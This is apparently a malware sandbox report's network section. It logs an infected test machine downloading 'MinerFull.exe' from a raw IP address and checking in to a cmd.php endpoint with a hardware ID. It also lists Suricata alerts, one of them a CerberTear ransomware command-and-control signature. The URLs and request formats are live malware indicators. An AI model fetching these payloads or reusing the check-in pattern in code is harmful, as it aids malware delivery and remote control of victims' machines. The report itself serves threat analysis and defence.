Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| xxx01xzb.beget.tech | 91.106.207.25 |
GET
200
http://107.189.6.214/5fFjAn68/MinerFull.exe
REQUEST
RESPONSE
BODY
GET /5fFjAn68/MinerFull.exe HTTP/1.1
Host: 107.189.6.214
Connection: Keep-Alive
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 4164096
Content-Type: application/x-ms-dos-executable
Last-Modified: Sun, 10 Apr 2022 21:10:36 GMT
Date: Tue, 12 Apr 2022 08:26:52 GMT
GET
200
http://xxx01xzb.beget.tech/cmd.php?hwid=7C6024AD
REQUEST
RESPONSE
BODY
GET /cmd.php?hwid=7C6024AD HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Tue, 12 Apr 2022 08:28:10 GMT
Content-Type: text/html
Content-Length: 3
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
GET
200
http://xxx01xzb.beget.tech/cmd.php?timeout=1
REQUEST
RESPONSE
BODY
GET /cmd.php?timeout=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: xxx01xzb.beget.tech
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Tue, 12 Apr 2022 08:28:10 GMT
Content-Type: text/html
Content-Length: 4
Connection: keep-alive
Keep-Alive: timeout=30
X-Powered-By: PHP/5.6.40
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49163 -> 107.189.6.214:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | A Network Trojan was detected |
| TCP 107.189.6.214:80 -> 192.168.56.101:49163 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 107.189.6.214:80 -> 192.168.56.101:49163 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 107.189.6.214:80 -> 192.168.56.101:49163 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
| TCP 192.168.56.101:49171 -> 91.106.207.25:80 | 2023505 | ET MALWARE CerberTear Ransomware CnC Checkin | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts